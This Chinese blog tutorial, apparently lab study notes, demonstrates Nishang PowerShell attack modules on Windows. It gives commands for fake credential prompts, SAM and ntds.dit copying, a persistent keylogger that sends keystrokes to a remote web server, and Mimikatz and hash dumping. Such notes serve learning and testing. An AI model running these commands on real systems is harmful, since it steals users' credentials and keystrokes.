Nishang 模块攻击实战

最新推荐文章于 2022-03-02 19:28:07 发布
最新推荐文章于 2022-03-02 19:28:07 发布
阅读量1.9k 收藏
点赞数
文章标签: powershell 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46104215/article/details/121487622
版权

windows 中已导入模块 nishang.psm1

1.Check-VM

检测当前机器是否为一台已知的虚拟机。通过检测已知的虚拟机的指纹信息(如 Hyper-V、VMware、Virtual PC、Virtual Box、Xen、QEMU)来识别。

2.Invoke-CredentialsPhish

作用:欺骗目标主机的用户,让用户输入密码

可更改脚本,不输入正确密码关闭不了对话框,只能强制结束进程。这样做成功得到明文的管理员账户密码

3.Copy-VSS

利用 Volume Shadow Copy服务复制sam文件,如果这个脚本运行在了 DC服务器上,ntds.dit 和 SYSTEM hive也能被拷贝出来

copy-vss    //直接将文件保存在当前目录下
copy-vss -DestinationDir 路径    //指定保存文件的路径(必须是已经存在的路径)

4.FireBuster FireListener扫描器

用于对内网进行扫描,打开本地监听,然后FireBuster远程传送数据,把包发个FireListener

(FireBuster对内网进行扫描,包发送给FireListener)

FireListener 130-150    //本机设置,监听端口
FireBuster 192.168.110.148 130-150 -Verbose    //目标机ip、扫描端口

5.Keylogger 键盘记录

目前为止所见过功能最强大的键盘记录

Get-Help .\nishang\gather\keylogger.ps1 -full    //注意keylogger.ps1 相对存放路径

//(1)键盘记录会保存在当前用户 Temp 目录下的 key 文件
.\nishang\gather\keylogger.ps1   
dir "\key.log*" /s    //寻找key.log文件 (cmd)

 找不到当前用户的temp目录,然后通过命令行进行搜索,发现有一个 appdata,又看不到,猜测应该是一个隐藏文件夹,打开控制面板显示隐藏文件夹(文件颜色 相对于 正常文件有点浅),或者通过搜索出来的路径直接访问文件

  

//(2)-CheckURL参数会检查所给出的网页之中是否包含 -MagicString 后的字符串,如果存在就停止使用记录(MagicString 后面添加不了字符串,如果stopthis存在),跟(1)作用差不多
.\nishang\gather\keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis   

//(3)将记录指定发送给一个可以记录Post请求的web服务器
.\nishang\gather\keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis -exfil -ExfilOption WebServer -URL http://192.168.254.226/data/catch.php    

//(4)实现持久化记录(重启后依然进行记录)
.\nishang\gather\keylogger.ps1 -persist

 生成 key.log 文件后,需要使用 Nishang Utility 中的 Parse_Keys 解析文件,会出现解析后的按键记录(在解析之前,先移动 key 文件到当前的目录)

Parse_keys .\key.log .\parsed.txt    //两个文件都是相对路径

  (key.log)    (parsed.txt)

6.Invoke-Mimikatz

抓取密码

//(1)Dump 出本机的凭证信息
Invoke-Mimikatz -DumpCreds

//(2)Dump 出远程的两台计算机的凭证信息
Invoke-Mimikatz -DumpCreds -ComputerName @("computer1", "computer2") 

//(3)在远程一台机器上运行Mimikatz并执行"privilege::debug exit"
Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1"

(win10测试,防毒后来关了)

7.Get-PassHashes

这个脚本在 Administrator 的权限下可以 Dump 出密码哈希值,来源于 Metasploit 中的 Power Dump 模块,但在其基础上做出了修改,使得不需要 SYSTEM 权限就可以 Dump

Get-PassHashes

8.获取用户的密码提示信息

这个脚本可以从 Windows 获得用户密码的提示信息,需要有 Administrator 的权限来读取sam hive。可以根据提示信息生成密码字典,能大大提高爆破的成功率。甚至有相当一部分人会将明文密码记录在这个提示信息中

get-PassHints

 

橙汁水
关注
NiShang.7z
09-05
服装商城项目,java开发,技术servlet+jsp;数据库文件请私聊
Nissan LEAF电池.pdf
09-03
Nissan LEAF电池技术详解】 1. 引言 全球对减少二氧化碳排放及摆脱化石燃料依赖的需求日益迫切,这是为了应对能源安全和环境问题的关键措施。电动汽车(EV)和燃料电池汽车作为零排放汽车的代表,被视为解决方案...
方程式组织攻击模块
Websec
02-15 868
我眼中的nishangICMP反弹shell攻击
ovowovo的博客
11-29 428
准备 靶机Windows10 IP 192.168.0.164 攻击机kali IP 192.168.0.159 靶机下载好nishang 下载链接https://github.com/samratashok/nishang 攻击机下载好icmpsh 下载链接https://github.com/inquisb/icmpsh.git 1.先查看两个机子是否能ping通 在这里插入图片描述 2.用...
Nishang(一)
gclome的博客
08-02 953
《web安全攻防》学习笔记之Nishang 文章目录1、简介2、Nishang导入与帮助获取3、Nishang模块攻击实战1 Check-VM2 Invoke-CredentialsPhish3Copy-VSS4 FireBuster FireListener 扫描器5 Keylogger键盘记录6 Invoke Mimikatz7 Get-PassHashes8 获取用户的密码提示信息4、PowerShell隐藏通信隧道1基于Tcp协议的PowerShell交互式Shell 1、简介 Nishang是一款
Final——Nishang
weixin_33928467的博客
06-23 296
一、介绍 Nishang是基于PowerShell渗透测试专用工具,它集成了框架、脚本和各种payload,被广泛应用于渗透测试的各个阶段。 二、使用 下载脚本工具:Nishang Nishang需要我们的Powershell版本在v3以上才能使用。 查看当前Powershell版本:get-host 进入相应目录下 导入框架:Import-Module .\nishang.psm1...
NISSAN.rar_atmega8_disc rdm_nissan_尼桑plat_车载
最新发布
09-23
标题中的“NISSAN.rar_atmega8_disc_rdm_nissan_尼桑plat_车载”揭示了这个压缩包文件的核心内容,它涉及到一个针对尼桑(Nissan)车载系统的升级或改装项目。其中,“atmega8”是微控制器,即Atmel公司的ATmega8...
11尼桑逍客MC9S12XH256VAG 1M80F_尼桑仪表_尼桑逍客仪表CPU数据_逍客_
10-03
尼桑逍客是一款深受消费者喜爱的城市SUV车型,而该标题和描述中提到的"MC9S12XH256VAG 1M80F"是其仪表系统中的一个重要组件,具体来说,这是一款微控制器(Microcontroller Unit,简称MCU),在汽车电子系统中扮演着...
尼桑计算器
05-19
这款软件在汽车维修和诊断领域具有重要的应用价值,尤其是对于那些需要处理尼桑汽车电子系统的专业技术人员。 首先,我们要理解尼桑汽车的安全系统。尼桑汽车采用了一种先进的防盗技术,该技术涉及到车辆的电子控制...
nishang, Nishang PowerShell测试和攻击性安全.zip
09-18
nishang, Nishang PowerShell测试和攻击性安全 Nishang是一个框架和脚本,它允许使用PowerShell安全性。穿透测试和红色组合的脚本。 在渗透测试的所有阶段,Nishang都是有用的。按 nikhil_mitt用法导入当前PowerShell会话( PowerShel
细说——Nishang
LainWith的博客
09-27 811
介绍 Powershell用于渗透测试其实早在多年前就已经被提出了,利用Powershell攻击者可以在无需接触磁盘的情况下执行命令等,并且相较已经被大家广泛关注并防御的cmd而言,Powershell并非那么的引人瞩目。Nishang是基于PowerShell渗透测试专用工具。它集成了框架、脚本和各种payload,能够帮助渗透测试人员在对Windows目标的全过程检测中使用,项目地址:https://github.com/samratashok/nishang ​ 【基于隐私,以及实验效果,我会在虚
Nishang 基础知识
weixin_46104215的博客
11-22 3387
Nishang 是一款针对 PowerShell 的渗透工具。它基于 PowerShell渗透测试专用工具,集成了框架、脚本和各种payload,包括了下载和执行、键盘记录、DNS、延时命令等脚本,被广泛应用于渗透测试的各个阶段 https://github.com/samratashok/nishang //下载地址 Nishang 要在 PowerShell3.0以上的环境中才可以正常使用,也就是在 Windows7默认下是有点小问题的,因为它自带的环境时...
Nishang 学习笔记
crowsec
03-02 2456
Nishang是基于PowerShell的后渗透测试专用工具,这里面有非常多的命令可以调用,虽然大部分情况存在av的情况下无法直接执行PowerShell,但是代码的思路值得我们学习!本文只列举了部分功能,全部功能各位师傅可以参考作者的说明文档!
内网神器-Nishang之信息收集篇(一)
qq_45434762的博客
07-05 654
Nishang简介Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载荷的一个集合。Nishang被广泛应用于渗透测试的各个阶段,本文主要介绍如何使...
内网神器-Nishang之信息收集篇(二)
qq_45434762的博客
07-08 293
域信息收集查询域net view /domain 查询域内计算机net view /domain:nowsec 查询域内所有用户组列表net group /domain 查询所有与成员计...
nishang的介绍与使用
weixin_30315723的博客
04-20 433
0x01前言 Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载荷的一个集合。Nishang被广泛应用于渗透测试的各个阶段,本文主要介绍如何使用Nishang的各种姿势获取一个shell。 项目地址 :https://github.com/samratashok/nishang 0x02 Powershell交互式Shel...
Powershell---Nishang工具简介
weixin_43679009的博客
12-01 1396
PowershellNishang工具简介 Nishang简介及安装 Nishang是一款针对Powershell的渗透工具。他基于Powershell渗透测试专用工具,集成了框架、脚本和各种Payload,包括了下载和执行、键盘记录、DNS、延时命令等脚本,被广泛应用于渗透测试是的各个阶段。 Nishang的安装 下载地址 Nishang要在Powershell 3.0以上的环境中才可以正常使用,也就是说在Windows7下默认是有点小问题的,因为win7下自带的环境是PowerSh
Nishang powershell框架——使用教程
W小哥
04-08 2122
项目下载地址:https://github.com/samratashok/nishang nishang目录列表 每个目录对应一个功能模块 导入模块nishang 必须导入nishang模块,才可以使用这个工具 Import-Module .\nishang psm1 首先打开powershell Import-Module .\nishang.psm1 初次导入,会有宏色字的提示,是因为windows官方做的一个安全策略导致 解决方法:把执行策略修改一下 Set-ExecutionPolicy R
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值